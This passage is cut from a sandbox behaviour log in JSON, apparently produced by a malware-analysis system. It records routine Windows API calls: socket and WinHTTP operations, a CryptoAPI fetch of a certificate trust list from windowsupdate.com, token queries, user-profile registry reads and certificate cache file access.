"id": 2658 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x73a12329", + "parentcaller": "0x739fe296", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00007010" + }, + { + "name": "optval", + "value": "" + } + ], + "repeated": 0, + "id": 2659 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000074c" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc3W\\xc0\\xa8{\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2660 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x739fce77", + "parentcaller": "0x73a030cb", + "category": "network", + "api": "WSARecv", + "status": false, + "return": "0xffffffffffffffff", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2661 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05856000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2662 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x73a046bc", + "parentcaller": "0x73a0463b", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2663 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x739fb419", + "parentcaller": "0x739ef397", + "category": "network", + "api": "WSASend", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Socket", + "value": "1868" + }, + { + "name": "Buffer", + "value": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca2805d6df8dd1d0 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/10.0\r\nHost: ctldl.windowsupdate.com\r\n\r\n" + } + ], + "repeated": 0, + "id": 2664 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x72dbccc2", + "parentcaller": "0x72dbcb67", + "category": "network", + "api": "WinHttpSendRequest", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + }, + { + "name": "Headers", + "value": "" + }, + { + "name": "Optional", + "value": "" + } + ], + "repeated": 0, + "id": 2665 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x74203ff5", + "parentcaller": "0x74204f8b", + "category": "network", + "api": "WinHttpReceiveResponse", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + } + ], + "repeated": 1, + "id": 2666 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x74204329", + "parentcaller": "0x742041a5", + "category": "network", + "api": "WinHttpQueryHeaders", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + } + ], + "repeated": 0, + "id": 2667 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x74204362", + "parentcaller": "0x742041a5", + "category": "network", + "api": "WinHttpQueryHeaders", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + } + ], + "repeated": 1, + "id": 2668 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x74204329", + "parentcaller": "0x742042ac", + "category": "network", + "api": "WinHttpQueryHeaders", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + } + ], + "repeated": 0, + "id": 2669 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x74204362", + "parentcaller": "0x742042ac", + "category": "network", + "api": "WinHttpQueryHeaders", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + } + ], + "repeated": 0, + "id": 2670 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x74204329", + "parentcaller": "0x742042ca", + "category": "network", + "api": "WinHttpQueryHeaders", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + } + ], + "repeated": 0, + "id": 2671 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x74204362", + "parentcaller": "0x742042ca", + "category": "network", + "api": "WinHttpQueryHeaders", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + } + ], + "repeated": 1, + "id": 2672 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05858000" + }, + { + "name": "RegionSize", + "value": "0x00012000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2673 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2674 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2675 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2676 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2677 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2678 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2679 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2680 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2681 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": false, + "return": "0xffffffffffffffff", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2682 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2683 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2684 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2685 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": false, + "return": "0xffffffffffffffff", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2686 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2687 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2688 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2689 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": false, + "return": "0xffffffffffffffff", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2690 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2691 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": false, + "return": "0xffffffffffffffff", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2692 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2693 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x739f7bb8", + "category": "network", + "api": "WSARecv", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2694 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x739fce77", + "parentcaller": "0x73a030cb", + "category": "network", + "api": "WSARecv", + "status": false, + "return": "0xffffffffffffffff", + "arguments": [ + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2695 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b8c89", + "parentcaller": "0x72d96c2c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000073c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2696 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b7eb6", + "parentcaller": "0x7420d081", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2697 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756ba174", + "parentcaller": "0x74598c38", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x0000073c" + } + ], + "repeated": 0, + "id": 2698 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x74598c8e", + "parentcaller": "0x745986ae", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2699 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756ba174", + "parentcaller": "0x745958cf", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000750" + } + ], + "repeated": 0, + "id": 2700 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b7eb6", + "parentcaller": "0x74599207", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x08\\xcfX\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2701 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2702 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000750" + }, + { + "name": "DesiredAccess", + "value": "0x000f003f", + "pretty_value": "KEY_ALL_ACCESS" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" + } + ], + "repeated": 0, + "id": 2703 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000750" + }, + { + "name": "ValueName", + "value": "Local AppData" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData" + } + ], + "repeated": 0, + "id": 2704 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000750" + }, + { + "name": "ValueName", + "value": "Local AppData" + }, + { + "name": "Type", + "value": "2", + "pretty_value": "REG_EXPAND_SZ" + }, + { + "name": "Information", + "value": "%USERPROFILE%\\AppData\\Local" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData" + } + ], + "repeated": 0, + "id": 2705 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2706 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000754" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001" + } + ], + "repeated": 0, + "id": 2707 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000754" + }, + { + "name": "ValueName", + "value": "ProfileImagePath" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001\\ProfileImagePath" + } + ], + "repeated": 0, + "id": 2708 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000754" + }, + { + "name": "ValueName", + "value": "ProfileImagePath" + }, + { + "name": "Type", + "value": "2", + "pretty_value": "REG_EXPAND_SZ" + }, + { + "name": "Information", + "value": "C:\\Users\\pacop" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001\\ProfileImagePath" + } + ], + "repeated": 0, + "id": 2709 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756ba8d9", + "parentcaller": "0x7420d2f8", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow" + } + ], + "repeated": 0, + "id": 2710 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756dcd70", + "parentcaller": "0x7420d38d", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000073c" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow" + }, + { + "name": "ShareAccess", + "value": "7", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 2711 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756ba8d9", + "parentcaller": "0x742057de", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" + } + ], + "repeated": 0, + "id": 2712 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b7eb6", + "parentcaller": "0x7420587b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2713 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756dcd70", + "parentcaller": "0x74203dc6", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000740" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" + }, + { + "name": "ShareAccess", + "value": "7", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 2714 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000740" + }, + { + "name": "DesiredAccess", + "value": "0xc0100080", + "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + }, + { + "name": "CreateDisposition", + "value": "3", + "pretty_value": "FILE_OPEN_IF" + }, + { + "name": "ShareAccess", + "value": "0" + }, + { + "name": "FileAttributes", + "value": "0x00000004", + "pretty_value": "FILE_ATTRIBUTE_SYSTEM" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2715 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756ba8d9", + "parentcaller": "0x742057de", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" + } + ], + "repeated": 0, + "id": 2716 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b7eb6", + "parentcaller": "0x7420587b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2717 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756dcd70", + "parentcaller": "0x74203dc6", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000073c" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" + }, + { + "name": "ShareAccess", + "value": "7", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 2718 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000073c" + }, + { + "name": "DesiredAccess", + "value": "0xc0100080", + "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506" + }, + { + "name": "CreateDisposition", + "value": "3", + "pretty_value": "FILE_OPEN_IF" + }, + { + "name": "ShareAccess", + "value": "0" + }, + { + "name": "FileAttributes", + "value": "0x00000004", + "pretty_value": "FILE_ATTRIBUTE_SYSTEM" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2719 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x742054bc", + "parentcaller": "0x7420574d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2720 + }, + { + "timestamp": "2025-03-07 